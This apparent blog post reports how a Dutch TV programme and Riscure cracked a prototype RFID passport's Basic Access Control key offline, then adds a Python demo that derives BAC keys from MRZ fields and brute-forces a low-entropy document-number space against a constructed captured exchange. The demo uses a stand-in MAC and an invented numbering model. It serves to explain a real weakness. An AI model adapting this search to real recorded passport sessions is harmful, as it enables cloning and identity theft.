A Dutch television program, "Nieuwslicht", recently worked with the local security firm Riscure to crack and decrypt a Dutch prototype RFID passport. The data exchange between the RFID reader and the passport was intercepted and recorded, and the access key was then cracked offline on a PC in about two hours, giving full access to the digitized fingerprint, photograph, and everything else stored on the chip, encrypted or not -- just perfect for slapping together a cloned passport, eh? The flaw is, at least in part, in how the secret key is generated. Under Basic Access Control the key is not random at all: it is derived from fields printed in the passport's machine-readable zone -- the document number, the holder's birth date, and the expiry date, each with its check digit. Because Dutch passport numbers are issued sequentially, the number is tied to the issue (and therefore the expiry) date, so the attacker is left guessing a far smaller set of values than the key length suggests, and each guess can be checked against the recorded exchange without ever touching the passport again.

But don't kick back in superior isolationism just yet, kid. Starting October 2006 the US will issue all new passports using the same ISO 14443 RFID tag and Basic Access Control scheme employed by the Dutch e-passports (and others) and adopted by the ICAO as global standards. It's still not clear at what distance the exchange was intercepted. The passive ISO 14443 tag is spec'd for a read distance of about 10 centimeters, but you'll find claims of reads at several meters, and passively eavesdropping on a session that a legitimate reader is already powering is a different problem from powering the chip yourself from afar, and one that works at greater distances. This matters 'cause the farther away the exchange can be captured in, say, the line at airport immigration control, the greater the chance of abuse. Regardless, the Dutch e-passport system is still under development, allowing for changes, which makes us wonder: is ours? Wouldn't be the first time we've abandoned RFID passport plans due to technology concerns.
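To make the key-generation point concrete, here is an added example in Python (not code from the original post, from Riscure, or from the ICAO specification). It implements the ICAO Doc 9303 check digit and the Basic Access Control key derivation (SHA-1 over the three MRZ fields, expanded into Kenc and Kmac with DES parity bits), then runs an offline search over a deliberately small MRZ space against a constructed "captured" exchange, confirming a guess by recomputing the MAC the reader sent. Everything about the numbering model (EPOCH, BASE_SERIAL, PER_DAY, VALIDITY), the NA-prefixed document numbers, the victim's values and the E_IFD bytes is made up for the demo and is not the real Dutch scheme; and because the standard library has no 3DES, the retail MAC the real protocol uses is replaced by a truncated HMAC-SHA1 stand-in (standin_mac), which changes nothing about how the search proceeds.

```python
"""BAC key derivation from MRZ fields plus an offline search over a
low-entropy MRZ space.  Added example, standard library only."""
import hashlib
import hmac
from datetime import date, timedelta


def check_digit(field):
    """ICAO 9303 check digit: weights 7,3,1 repeating; '<' = 0, A..Z = 10..35."""
    total = 0
    for i, ch in enumerate(field):
        if ch == "<":
            v = 0
        elif ch.isdigit():
            v = int(ch)
        else:
            v = ord(ch.upper()) - ord("A") + 10
        total += v * (7, 3, 1)[i % 3]
    return str(total % 10)


def mrz_information(doc_no, dob_yymmdd, expiry_yymmdd):
    """Doc 9303 'MRZ_information': document number (padded to 9 with '<'),
    birth date and expiry date, each followed by its check digit."""
    doc = doc_no.ljust(9, "<")
    return (doc + check_digit(doc)
            + dob_yymmdd + check_digit(dob_yymmdd)
            + expiry_yymmdd + check_digit(expiry_yymmdd))


def _odd_parity(key):
    """Force DES odd parity on every byte (the LSB is the parity bit)."""
    out = bytearray()
    for b in key:
        high = b & 0xFE
        out.append(high | (0 if bin(high).count("1") % 2 else 1))
    return bytes(out)


def derive_keys(mrz_info):
    """Kseed = SHA-1(MRZ_information)[:16]; Kenc, Kmac = SHA-1(Kseed || counter)[:16]
    with 32-bit big-endian counters 1 and 2, parity-adjusted."""
    kseed = hashlib.sha1(mrz_info.encode("ascii")).digest()[:16]

    def kdf(counter):
        return _odd_parity(hashlib.sha1(kseed + counter.to_bytes(4, "big")).digest()[:16])

    return kdf(1), kdf(2)


def standin_mac(kmac, data):
    """Stand-in for the 3DES retail MAC of the real protocol (stdlib has no DES):
    the search only needs *a* MAC keyed by Kmac over the captured E_IFD."""
    return hmac.new(kmac, data, "sha1").digest()[:8]


# Hypothetical sequential numbering model (an assumption, NOT the real Dutch scheme):
# serials climb by PER_DAY per issuing day and documents are valid for VALIDITY,
# so a guess at the expiry date pins the serial to a narrow window.
EPOCH = date(2000, 1, 1)
BASE_SERIAL = 1_000_000
PER_DAY = 2_000
VALIDITY = timedelta(days=5 * 365)


def candidate_mrzs(expiry_guess, expiry_slop, serial_slop, dob_guess, dob_slop):
    """Yield (doc_no, dob, expiry) strings consistent with the model above."""
    for de in range(-expiry_slop, expiry_slop + 1):
        expiry = expiry_guess + timedelta(days=de)
        est = BASE_SERIAL + PER_DAY * (expiry - VALIDITY - EPOCH).days
        for serial in range(est - serial_slop, est + serial_slop + 1):
            for db in range(-dob_slop, dob_slop + 1):
                dob = dob_guess + timedelta(days=db)
                yield f"NA{serial:07d}", dob.strftime("%y%m%d"), expiry.strftime("%y%m%d")


def search_space_size(expiry_slop, serial_slop, dob_slop):
    """Number of candidates the generator above will produce."""
    return (2 * expiry_slop + 1) * (2 * serial_slop + 1) * (2 * dob_slop + 1)


def recover_mrz(e_ifd, m_ifd, candidates):
    """Offline search over a captured (E_IFD, M_IFD): the reader MACs E_IFD under Kmac,
    so a candidate is confirmed by re-deriving Kmac and recomputing the MAC."""
    tries = 0
    for doc_no, dob, expiry in candidates:
        tries += 1
        info = mrz_information(doc_no, dob, expiry)
        _, kmac = derive_keys(info)
        if hmac.compare_digest(standin_mac(kmac, e_ifd), m_ifd):
            return info, tries
    return None, tries


def demo():
    """Constructed victim + constructed capture; returns (recovered?, tries, space size)."""
    expiry = date(2011, 3, 15)
    serial = BASE_SERIAL + PER_DAY * (expiry - VALIDITY - EPOCH).days + 17  # fits the model
    victim = mrz_information(f"NA{serial:07d}", "790806", expiry.strftime("%y%m%d"))
    _, kmac = derive_keys(victim)
    e_ifd = bytes(range(32))                 # constructed stand-in for the 32-byte E_IFD
    m_ifd = standin_mac(kmac, e_ifd)         # what the "reader" sent; attacker recorded both
    # Attacker's knowledge: expiry within +-3 days, serial within +-40, birth date within +-10 days.
    cands = candidate_mrzs(date(2011, 3, 13), 3, 40, date(1979, 8, 1), 10)
    found, tries = recover_mrz(e_ifd, m_ifd, cands)
    return found == victim, tries, search_space_size(3, 40, 10)


if __name__ == "__main__":
    print(demo())
```

The point to take from the numbers: a 9-character alphanumeric document number plus two dates looks like a lot of key material, but once the number is a function of the date and the birth date can be eyeballed, the search collapses to a few thousand SHA-1 calls per plausible window, which is why a recorded session can be cracked after the fact on an ordinary PC.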
[Via The Register and Vara (Dutch), Thanks